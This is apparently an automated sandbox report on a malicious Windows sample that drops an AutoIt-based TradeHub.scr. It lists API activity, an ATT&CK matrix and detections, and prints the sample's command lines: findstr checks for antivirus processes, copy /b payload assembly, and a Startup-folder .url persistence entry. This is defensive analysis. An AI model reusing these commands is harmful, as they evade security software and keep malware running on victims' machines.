Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000C5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_000C5EDA
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DE59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,15_2_00DE59B3
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D75EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,15_2_00D75EDA
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000D33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_000D33B7
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_10-100298
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifAPI coverage: 4.7 %
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrAPI coverage: 4.5 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00114005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00114005
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_0011494A GetFileAttributesW,FindFirstFileW,FindClose,10_2_0011494A
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00113CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00113CE2
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_0011C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0011C2FF
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_0011CD14 FindFirstFileW,FindClose,10_2_0011CD14
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_0011CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_0011CD9F
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_0011F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0011F5D8
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_0011F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0011F735
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_0011FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0011FA36
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DC4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_00DC4005
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DC494A GetFileAttributesW,FindFirstFileW,FindClose,15_2_00DC494A
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DCC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_00DCC2FF
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DCCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,15_2_00DCCD9F
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DCCD14 FindFirstFileW,FindClose,15_2_00DCCD14
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DCF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_00DCF5D8
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DCF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_00DCF735
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DCFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_00DCFA36
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DC3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_00DC3CE2
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000C5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_000C5D13
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\182349\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\182349Jump to behavior
Source: Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: TradeHub.scr, 0000000F.00000002.3506788424.0000000000C73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_001245D5 BlockInput,10_2_001245D5
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000C5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_000C5240
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000E5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,10_2_000E5CAC
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_001088CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_001088CD
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000DA354 SetUnhandledExceptionFilter,10_2_000DA354
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000DA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_000DA385
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D8A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00D8A385
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00D8A354 SetUnhandledExceptionFilter,15_2_00D8A354
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00109369 LogonUserW,10_2_00109369
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000C5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_000C5240
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00111AC6 SendInput,keybd_event,10_2_00111AC6
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_001151E2 mouse_event,10_2_001151E2
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Sunset Sunset.bat & Sunset.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 182349Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "RefundAlienConservativeChapters" Coral Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Cause + ..\Shopper + ..\Edges + ..\Zinc + ..\Correlation + ..\Wearing + ..\Provision + ..\Res lJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\182349\Beginners.pif Beginners.pif lJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\z"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & echo url="c:\users\user\appdata\local\tradeoptimize dynamics\tradehub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & exit
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & echo url="c:\users\user\appdata\local\tradeoptimize dynamics\tradehub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & exitJump to behavior
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_001088CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_001088CD
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00114F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00114F1C
Source: file.exe, 00000000.00000003.1665758727.0000000002B74000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003755000.00000004.00000800.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000000.1687565395.0000000000166000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Beginners.pif, TradeHub.scrBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000D885B cpuid 10_2_000D885B
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000F0030 GetLocalTime,__swprintf,10_2_000F0030
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000F0722 GetUserNameW,10_2_000F0722
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_000E416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,10_2_000E416A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: TradeHub.scrBinary or memory string: WIN_81
Source: TradeHub.scrBinary or memory string: WIN_XP
Source: TradeHub.scrBinary or memory string: WIN_XPe
Source: TradeHub.scrBinary or memory string: WIN_VISTA
Source: TradeHub.scrBinary or memory string: WIN_7
Source: TradeHub.scrBinary or memory string: WIN_8
Source: Sp.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_0012696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,10_2_0012696E
Source: C:\Users\user\AppData\Local\Temp\182349\Beginners.pifCode function: 10_2_00126E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_00126E32
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DD696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,15_2_00DD696E
Source: C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scrCode function: 15_2_00DD6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,15_2_00DD6E32

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information11
Scripting		2
Valid Accounts		1
Windows Management Instrumentation		11
Scripting		1
Exploitation for Privilege Escalation		1
Disable or Modify Tools		21
Input Capture		2
System Time Discovery		Remote Services1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		LSASS Memory1
Account Discovery		Remote Desktop Protocol21
Input Capture		1
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Command and Scripting Interpreter		2
Valid Accounts		2
Valid Accounts		2
Obfuscated Files or Information		Security Account Manager3
File and Directory Discovery		SMB/Windows Admin Shares3
Clipboard Data		1
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Registry Run Keys / Startup Folder		21
Access Token Manipulation		1
DLL Side-Loading		NTDS17
System Information Discovery		Distributed Component Object ModelInput Capture1
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection		111
Masquerading		LSA Secrets131
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder		2
Valid Accounts		Cached Domain Credentials4
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Access Token Manipulation		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
Process Injection		Proc Filesystem1
System Owner/User Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523781 Sample: file.exe Startdate: 02/10/2024 Architecture: WINDOWS Score: 92 44 bsQfWYzSEObgoEYPHvZYAafhPH.bsQfWYzSEObgoEYPHvZYAafhPH 2->44 48 Multi AV Scanner detection for dropped file 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 Sigma detected: Search for Antivirus process 2->52 54 4 other signatures 2->54 10 file.exe 23 2->10         started        12 wscript.exe 1 2->12         started        signatures3 process4 signatures5 15 cmd.exe 2 10->15         started        60 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->60 19 TradeHub.scr 12->19         started        process6 file7 40 C:\Users\user\AppData\Local\...\Beginners.pif, PE32 15->40 dropped 46 Drops PE files with a suspicious file extension 15->46 21 Beginners.pif 4 15->21         started        25 cmd.exe 2 15->25         started        27 conhost.exe 15->27         started        29 7 other processes 15->29 signatures8 process9 file10 36 C:\Users\user\AppData\Local\...\TradeHub.scr, PE32 21->36 dropped 38 C:\Users\user\AppData\Local\...\TradeHub.js, ASCII 21->38 dropped 56 Multi AV Scanner detection for dropped file 21->56 58 Drops PE files with a suspicious file extension 21->58 31 cmd.exe 2 21->31         started        signatures11 process12 file13 42 C:\Users\user\AppData\...\TradeHub.url, MS 31->42 dropped 34 conhost.exe 31->34         started        process14

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
file.exe11%ReversingLabsWin32.Backdoor.Generic
file.exe17%VirustotalBrowse
file.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\182349\Beginners.pif5%ReversingLabs
C:\Users\user\AppData\Local\Temp\182349\Beginners.pif11%VirustotalBrowse
C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr5%ReversingLabs
C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr11%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
http://www.autoitscript.com/autoit3/J0%VirustotalBrowse
https://www.autoitscript.com/autoit3/0%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bsQfWYzSEObgoEYPHvZYAafhPH.bsQfWYzSEObgoEYPHvZYAafhPH
unknown
unknownfalse
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.autoitscript.com/autoit3/Jfile.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000000.1687736473.0000000000179000.00000002.00000001.01000000.00000006.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr, 0000000F.00000002.3506982744.0000000000E29000.00000002.00000001.01000000.00000008.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.drfalseunknown
    http://nsis.sf.net/NSIS_ErrorErrorfile.exefalse
    • URL Reputation: safe
    		unknown
    https://www.autoitscript.com/autoit3/file.exe, 00000000.00000003.1665758727.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000002.3507516822.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, Beginners.pif, 0000000A.00000003.1695763329.0000000003763000.00000004.00000800.00020000.00000000.sdmp, TradeHub.scr.10.dr, Beginners.pif.1.dr, Sp.0.drfalseunknown

    World Map of Contacted IPs

    No contacted IP infos

    General Information

    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1523781
    Start date and time:2024-10-02 02:29:39 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 8m 6s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Run name:Run with higher sleep bypass
    Number of analysed new started processes analysed:20
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:file.exe
    Detection:MAL
    Classification:mal92.expl.evad.winEXE@28/18@2/0
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 101
    • Number of non-executed functions: 295
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

    Warnings

    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    • Report creation exceeded maximum time and may have missing disassembly code information.
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size exceeded maximum capacity and may have missing disassembly code.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.

    Simulations

    Behavior and APIs

    TimeTypeDescription
    01:30:33AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url
    20:31:09API Interceptor6928x Sleep call for process: Beginners.pif modified
    20:31:22API Interceptor6152x Sleep call for process: TradeHub.scr modified

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASNs

    No context

    JA3 Fingerprints

    No context

    Dropped Files

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    C:\Users\user\AppData\Local\Temp\182349\Beginners.piffile.exeGet hashmaliciousStealcBrowse
      file.exeGet hashmaliciousStealcBrowse
        file.exeGet hashmaliciousStealcBrowse
          file.exeGet hashmaliciousClipboard Hijacker, VidarBrowse
            file.exeGet hashmaliciousLummaCBrowse
              file.exeGet hashmaliciousAmadeyBrowse
                file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
